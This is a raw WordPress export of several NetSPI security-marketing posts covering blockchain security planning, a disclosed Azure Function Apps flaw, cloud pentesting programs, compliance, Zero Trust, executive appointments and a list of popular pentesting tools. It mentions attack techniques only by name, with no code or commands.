Blockchain is an effective business strategy that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.
Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”
Definition of Blockchain, or Distributed Ledger Technology (DLT)
Distributed Ledger Technology (DLT), commonly known as “blockchain” is a distributed database secured with cryptography. How this unfolds in reality has many interpretations. One commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions after servers, or nodes, work together to establish the real state of a database.
“Blockchain is fundamentally a distributed database secured with cryptography.”
One example of blockchain is smart contracts. They act as web applications stored directly on the chain and operate deterministically without requiring an entity to execute the code. Smart contracts allow responsible parties to communicate information including transactions without the use of an intermediary.
The many unique use cases of blockchain give it vast appeal, but it may be particularly useful in industries such as large financial institutions and retail groups.
Blockchain Security in Deployments
Much of the data handled with blockchain is considered sensitive, therefore making it valuable to malicious actors. As with many newer technologies, vulnerabilities can become an issue if security is not baked in from the start.
“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.”
Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models to name a few. Exploring blockchain uses through a cybersecurity lens puts organizations ahead of weaknesses or gaps before vulnerabilities occur.
6 Questions to Prioritize Blockchain Security
These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use these as a starting point to gain alignment between IT and security teams, as well as other internal departments who may be affected by blockchain use.
Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?
What chain technologies are going to be part of our deployments? Are these chains public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have code audit plan in place?
Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
Are we performing any custodial or direct ownership of digital assets? Is transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have key recovery process in place? Are we relying entirely on third party APIs to access the chain?
Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state-desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain?
Make Blockchain Security Part of Your Strategy
The goal of DLT is to create a shared database which can be trusted by multiple entities who don’t necessarily trust one another. Blockchain is the answer to this challenge, but it's a newer technology with its full potential still being realized.
[post_title] => 6 Questions to Plan for Blockchain Security
[post_excerpt] => These six questions will help teams plan for blockchain security from the start to get ahead of potential gaps that can result in vulnerabilities.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => blockchain-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-27 15:22:53
[post_modified_gmt] => 2023-03-27 20:22:53
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29770
[menu_order] => 2
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[1] => WP_Post Object
(
[ID] => 29763
[post_author] => 91
[post_date] => 2023-03-23 08:00:00
[post_date_gmt] => 2023-03-23 13:00:00
[post_content] =>
Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.
Minneapolis, MN – NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered a flawed functionality in Azure Function Apps that allowed for privilege escalation.
Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults.
Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints.
“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”
https://youtu.be/ClCeHiKIQqE
Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.
The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.
About NetSPI
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.
A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud. Cloud security controls can often be more complex with intricate nuances. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects around security, organizations still have a responsibility to understand what exactly is within their control to secure. Sometimes the default settings from the cloud provider are not always the most secure for every environment. This differs from a traditional security program because of the shared responsibility or "shared fate" model.
With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.
Best Practices to Create a Cloud Penetration Testing Program
Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.
1. Building a secure cloud from the start
Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It’s important to consider this from a human element and a technical one. For example, from the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure by default environments. Whereas from a technical standpoint, consider using Infrastructure as Code (IaC) adoption to help enforce a security baseline.
2. Performing regular configuration reviews and pentesting
Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.
Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.
3. Establishing security guardrails
Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.
Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.
Refine Your Cloud Pentesting Program with NetSPI
These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.
Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.
However, this is not to say that lower risk environments, like a dev environment with test data, is not important. Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities in order to ensure that the same, or similar, issues do not happen again.
Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.
[post_title] => 3 Fundamentals for a Strong Cloud Penetration Testing Program
[post_excerpt] => The cloud reigns supreme, making it a target for threat actors. Learn the basics of creating and enhancing a secure cloud penetration testing program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cloud-penetration-testing-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-20 15:46:28
[post_modified_gmt] => 2023-03-20 20:46:28
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29724
[menu_order] => 5
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[3] => WP_Post Object
(
[ID] => 29699
[post_author] => 91
[post_date] => 2023-03-14 09:00:00
[post_date_gmt] => 2023-03-14 14:00:00
[post_content] =>
NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast, Nabil Hannan invited Senior Compliance Manager at Secureframe Marc Rubbinaccio on episode 53 to discuss how security fits into compliance, and vice versa.
The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.
Dive into the highlights below, then head over to Agent of Influence and listen to the full episode.
Reframing the Mentality of Cybersecurity Compliance
The sentiment around compliance often centers around meeting requirements, not building an effective security program — but Marc offers a refined perspective. He poses that this mentality may be more prevalent at enterprise organizations with advanced security processes, making the baseline security controls outlined in compliance more of a check-the-box exercise, as opposed to a preventative cybersecurity strategy.
But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.
Technology is evolving faster than compliance can keep up with, which has led to the PCI DSS council allowing a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove what they’ve implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay course.
Choosing a Security Compliance Framework
Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey.
“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”
Marc Rubbinaccio, Secureframe
Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:
SOC2: The American Institute of Certified Public Accountants (AICPA) centers SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy.
ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC) developed ISO 27001 as the latest standard to continue handling information security. ISO 27001 encourages the adoption of an Information Security Management System to protect the confidentiality, integrity, and availability of information.
These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.
Changes to PCI DSS v4.0
Marc’s area of focus is PCI DSS, which recently released an updated version, PCI 4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self Assessment Questionnaires type A (SAQ A), which is used when merchants outsource all aspects of payment processing to a third-party service provider, such as capturing, storage, transmission of cardholder data.
These changes were driven by the increase in e-skimming attacks on payment pages, a technology used to intercept the input of private information into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer’s browser in addition to external vulnerability scanning.
With all of these never-ending changes, what can internal IT teams do to keep up with security compliance?
“The strongest and most powerful tool you have are the experts that you work with.”
Marc Rubbinaccio, Secureframe
How Organizations Can Prepare for Changes to Security Compliance
Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you are essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.
Whether your organization partners with a third-party, or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It's OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it’s time for your next audit.
The Intersection of Pentesting and Security Compliance
Penetration testing is critical in vulnerability management programs because penetration testing takes vulnerability scanning a step further. Scanners perform fingerprinting against operating system and software versions compared to publicly released vulnerable versions, in addition to fuzzing, or mass-injecting data to discover vulnerabilities within input fields. They are a great tool for identifying assets and surface level vulnerabilities, while pentesting uses the data found by scanners to try and exploit a vulnerability and continue to pivot within your environment.
The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks and remediate gaps. Compliance frameworks have picked up how important pentests are, with some of them requiring penetration testing annually and when significant changes occur, including PCI, FedRAMP, and HITRUST.
Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening Marc’s podcast episode here.
[post_title] => How to Build a Baseline Cybersecurity Posture with Security Compliance
[post_excerpt] => Compliance manager Marc Rubbinaccio joins NetSPI to discuss how a secure environment and security compliance go hand-in-hand.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => baseline-cybersecurity-posture-security-compliance
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-17 14:48:49
[post_modified_gmt] => 2023-03-17 19:48:49
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29699
[menu_order] => 6
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[4] => WP_Post Object
(
[ID] => 29580
[post_author] => 91
[post_date] => 2023-03-07 09:00:00
[post_date_gmt] => 2023-03-07 15:00:00
[post_content] =>
On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode.
3 Misconceptions of Zero Trust Implementation
One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges on the path to a greater end state of cybersecurity that can stall organizations on their progress. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions.
Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter.
Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.
The chatter around Zero Trust is dense, leading to mixed messages around what Zero Trust is and isn’t. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar in Zero Trust, it is only one aspect of the overarching strategy. Having too narrow a focus on a singular pillar leaves gaps in Zero Trust implementation, keeping your company at the crosshairs of a potential breach.
https://youtube.com/shorts/91TPs4HGww0
Misconception #2: Zero Trust is a product.
Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.
Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematiclly enhance security across many areas of a business.
Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve.
Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.
This is the most common misnomer we hear in conversations. Zero Trust is complex, and when trying to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows, the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.
“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.”
– Rob LaMagna-Reiter, CISO at Hudl
While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity.
Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals
Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.
Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.
[post_title] => 3 Misconceptions with Zero Trust Implementation
[post_excerpt] => Zero Trust implementation is different for every company, but these common misconceptions present universal scenarios most teams face.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => misconceptions-zero-trust-implementation
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-03 15:59:26
[post_modified_gmt] => 2023-03-03 21:59:26
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29580
[menu_order] => 8
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[5] => WP_Post Object
(
[ID] => 29570
[post_author] => 91
[post_date] => 2023-03-06 08:00:00
[post_date_gmt] => 2023-03-06 14:00:00
[post_content] =>
Seasoned cybersecurity and finance executives Vinay Anand and Jay Golonka will guide product and growth strategies for the offensive security leader.
Minneapolis, MN – NetSPI, the leader in offensive security, today announced two C-Suite leadership appointments, Chief Product Officer (CPO) Vinay Anand and Chief Financial Officer (CFO) Jay Golonka. They bring decades of experience supporting high-growth technology companies and will be instrumental in leading NetSPI’s technology growth.
"These appointments signal pivotal transformation for NetSPI, as we continue to evolve our technology platforms to meet the offensive security needs of the modern enterprise," said Aaron Shilts, CEO at NetSPI. "Vinay and Jay will play a key role in delivering the highest quality security solutions at-scale and maintaining profitable growth."
Anand is a seasoned technology leader, most recently supporting Palo Alto Networks’ Prisma Cloud as VP of Product. He will oversee NetSPI’s product strategy across the entire portfolio of offensive security solutions. This includes Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS), along with future, complementary technology investments. Over the last 20 years, he has led product strategy, engineering, marketing, and business development for a variety of security, software, and networking products. He has held leadership roles with Anthos, Google’s managed hybrid cloud platform, as well as IBM Security, McAfee, and Cisco Systems.
"The need to enable enterprise security professionals to accurately assess their risks in real time has never been more urgent and necessary," said Anand. "NetSPI is uniquely positioned to deliver on this mandate with their platform driven, human delivered methodology. I’m excited to join the team as their first Chief Product Officer to continue the momentum they’ve built bringing high-value, high-fidelity solutions to the industry."
Golonka brings over 25 years of experience leading high performing finance teams through periods of rapid growth. At NetSPI he will focus on scaling the team and providing actionable business insights across the organization. Previously, Golonka was the CFO at PE-backed software company Prometheus Group. During his time there, he led them through nine acquisitions. Jay spent 18 years in public accounting and had finance leadership positions at two other high-growth software companies before joining Prometheus Group. Over his career, he has worked with organizations as they navigate the public company environment, including organizations going through the formal IPO process.
"I was immediately aligned with NetSPI’s vision to expand the breadth and scale of their solutions," said Golonka. "They’ve experienced incredible growth by providing impactful solutions to real problems in the industry – and show no signs of stopping. I look forward to being a contributing part of the journey."
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Veteran security industry executives appointed to support offensive security leader’s next stage of growth.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and offensive security, today announced the appointment of Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will help support the company’s next stage of growth following a year of record momentum.
“We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale.”
With over two decades of technology and security industry experience, Lundgren currently serves as the Chief Technology Officer at VMware Carbon Black. Having taken the journey with Carbon Black as a founding member, through IPO in 2018, and the VMware acquisition in 2019, he brings a long history of balancing technology requirements under the pressure of rapid business growth. Lundgren has a foundational understanding of offensive security, beginning his cybersecurity career penetration testing for the U.S. Air Force.
“Penetration testing is an area of security that benefits from the underlying expertise of the team and the rigor in which the work is performed and communicated,” said Lundgren. “NetSPI has built an incredible team of offensive security experts, with a hands-on, customer-first approach that stands out in the industry. I look forward to being part of NetSPI’s growth story.”
Spiliotis currently serves as a sales and go-to-market (GTM) advisor with NetSPI investor KKR. Prior to his advisory engagement with the global investment firm, he held several executive sales positions with high-growth technology companies, most recently serving as the Senior Vice President of Sales at Palo Alto Networks. Spiliotis also serves on the Board of Directors for ReliaQuest and is a GTM advisor for various other cybersecurity companies.
“Two years ago, I was introduced to NetSPI through KKR’s Next-Generation Technology growth portfolio. Immediately, they impressed me with their momentum, energy, and value proposition,” said Spiliotis. “NetSPI has the right ingredients to continue achieving massive success. I’m honored to join the Board, where I’ll continue to help NetSPI maximize its opportunity and support employee development in the sales organization alongside the leadership team and my partners at KKR.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world's most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Twitter and LinkedIn.
[post_title] => NetSPI Appoints Scott Lundgren and John Spiliotis to its Board of Directors
[post_excerpt] => Carbon Black founding member and KKR advisor join the NetSPI Board of Directors to support the company’s next stage of growth.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => board-of-directors-appointments
[to_ping] =>
[pinged] =>
[post_modified] => 2023-02-20 13:37:27
[post_modified_gmt] => 2023-02-20 19:37:27
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29454
[menu_order] => 15
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[7] => WP_Post Object
(
[ID] => 29370
[post_author] => 91
[post_date] => 2023-02-14 08:00:00
[post_date_gmt] => 2023-02-14 14:00:00
[post_content] =>
In this overview of 36 notable vendors, Forrester explores the benefits of External Attack Surface Management (EASM) and key functionalities to consider when selecting a partner.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management is recognized in The External Attack Surface Management Landscape, Q1 2023, authored by global research and advisory firm Forrester. The Landscape report aims to help organizations understand the value of EASM solutions and provides security professionals with an overview of notable vendors so they can select a solution based on their needs.
“The attack surface management market has seen incredible innovation and evolution. This report examines the benefits EASM brings to global enterprises – increased asset visibility, continuous pentesting, and better risk prioritization, to name a few,” said Jake Reynolds, Head of Emerging Technology at NetSPI. “We believe we play an important role in this market and are honored to be recognized by Forrester.”
In the report, Forrester defines EASM as “tools or functionalities that continually scan for, discover, and enumerate internet-facing assets, establish the unique fingerprints of discovered assets, and identify exposures on both known and unknown assets.” EASM vendors recognized alongside NetSPI all have varying features and use cases.
As mentioned in the research, NetSPI reports that its Attack Surface Management (ASM) solution is selected by clients for most or all of the use cases identified by Forrester. Forrester’s complete list of included use cases is:
Asset discovery
Asset inventory management
Vulnerability risk management
Cloud security posture management
Mergers and acquisitions (M&A) due diligence assistance
Supply chain/third-party risk management
Penetration testing
Governance, risk, and compliance (GRC)
Incident response and investigations
Breach and attack simulations (BAS)
Certificate management
NetSPI is listed as a managed service offering, with an industry focus in financial services, high-tech, and media. Visit www.netspi.com to schedule a demo of NetSPI’s ASM platform.
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
On February 2, NetSPI Managing Director Ron Kurisack was featured in the SecurityWeek article called Cyber Insights 2023 | Regulations. Read the preview below or view it online.
+++
SecurityWeek Cyber Insights 2023 | Regulations – In this world, nothing is certain but death, taxes, and cyber regulations. The first is static, the second goes up and down, but the third seems only to increase. The three primary drivers for cyber regulations are voter privacy, the economy, and national security – with the complication that the first is often in conflict with the second and third.
Transatlantic data flows
Privacy is the headline battleground going forward, and amply illustrates the conflict between voter demands and national economies. This can be seen in the unsettled but multi-year attempt to find a legal solution to the transfer of personal user data from Europe to the US. Economics demands it, but European law (GDPR) and swathes of European public opinion deny it.
At the time of writing, it is almost certainly illegal to transfer PII from Europe to the US. The Privacy Shield – the second attempt at finding a workaround to GDPR – was declared illegal in what is known as the Schrems II court ruling. The wording of that ruling almost certainly eliminates an alternative approach known as ‘standard contractual clauses’.
During 2022, the European Commission (EC) and the US Biden administration have worked on developing a replacement for Privacy Shield. The ball was obviously in the US court, and on October 7, 2022, Biden issued an Executive Order to implement the EU-US Data Privacy Framework agreement – sometimes known as Privacy Shield 2.0.
This was enthusiastically greeted by US business. IBM, for example, issued a statement, “These steps will restore certainty to the thousands of companies already self-certified under Privacy Shield. Providing predictable, free flows of data between the US and the EU will secure the mutual benefits of continued business cooperation and will create a foundation for future economic growth.”
Finally
Martin Zinaich, CISO at the City of Tampa, once suggested to SecurityWeek, “If it ain’t required, it ain’t gonna happen.” We may have reached the point, with better organized cybercriminals and more aggressive nation states, where it must happen and therefore must be required.
Ron Kuriscak, MD at NetSPI, certainly believes so. “Regulations need to become much more mature, stringent, and punitive. We must hold organizations more accountable for their inaction in the area of cybersecurity… Organizations will be held accountable for basic cybersecurity hygiene. If they are unable to meet the most basic standards a regulator will require a third party to take over cybersecurity program execution (they will be mandated to cover the associated costs). Similar to the FDA, we will start seeing industry-aligned compliance regulations with real penalties that will force real compliance and organizational change. The key will be enforcement and penalties.”
Type “pentesting” into GitHub, and you’ll find nearly 9,000 repository results.
Finding the right penetration testing tools can be a daunting task, given the sheer number of both open source and commercial options available. Using the right tool for the right objective – from capturing and manipulating HTTP traffic to finding SQL injection during web application pentests – can make a significant impact during assessments.
To help narrow your search parameters, we surveyed our team of 200+ global pentesters to identify the 12 must-have pentesting tools of the moment. Drumroll please…
Recognized as the industry standard in web application penetration testing, Burp Suite is primarily used to capture and manipulate HTTP traffic.
It combines a top-class proxy, web vulnerability scanner, and an extensive ecosystem of extensions making it invaluable for performing penetration tests. BurpSuite provides a great level of control for users to uncover and exploit vulnerabilities while scanning for common web application flaws.
“I have used this tool nearly every day for over ten years. I have performed SQL Injections, server-side request forgeries, authentication/authorization bypasses, cross-site scripting, Java deserialization attacks, various code injections and remote code executions, and more.”
– Eric Gruber, Director, Attack Surface Management
“I use this tool for every pentest I do! For one test, I was able to intercept a file upload request and inject a malicious DTD to exploit server-side request forgery.”
– Karin Knapp, Security Consultant II
2. NMAP
NMAP (Network Mapper) is a popular pentesting tool used to assess networks for open ports and vulnerabilities. It has been around for many years, amassing a great deal of community support, excellent documentation, and expansive functionality. NetSPI’s global pentesting team uses it extensively in Attack Surface Management.
“We use it all the time in Attack Surface Management to identify open ports on our clients' attack surfaces. This is the first step in exploiting a large majority of vulnerabilities.”
Behind the scenes, Resolve is also a penetration testing workbench for our services team and select clients that purchase a subscription.
From a workbench perspective, it’s a one-stop shop for NetSPI pentesting assessments: it houses checklists, allows our consultants to communicate with clients, stores documents, and is a central platform to document findings.
Resolve’s checklists and finding templates help our pentesters be more consistent with their documentation and help in organizing a methodical and thorough testing process, a key reason why our consultants nominated it as a top tool.
The platform saves hours, even days, by taking the output from tools and sorting and correlating the findings. In addition, it can track findings and detections over time, which has enabled NetSPI to build out a large vulnerability repository with thousands of instructions for validating findings.
“Resolve takes care of 95% of the reporting process for me, so I can spend more time actually helping the client and doing my job.”
- Cameron Geehr, Managing Consultant
“…Compared to other companies I have worked at, Resolve at least halves the amount of time spent reporting, allowing for more time to be spent performing testing.”
CrackMapExec is a versatile pentesting tool used to perform various post-exploitation techniques from a single user-interface. NetSPI pentesters have used this tool to execute pass-the-hash attacks, credential dumping, password spraying, and more – often resulting in administrative compromise.
“It is actively developed and is a framework that allows execution of multiple techniques and interaction with multiple common services.”
While Browser Dev Tools are a built-in feature in all modern browsers intended to allow developers to debug their web applications, it can also be leveraged by penetration testers. Dev Tools’ availability in modern browsers like Safari, Chrome, and Firefox makes it one of the most foundational and accessible means of application security testing.
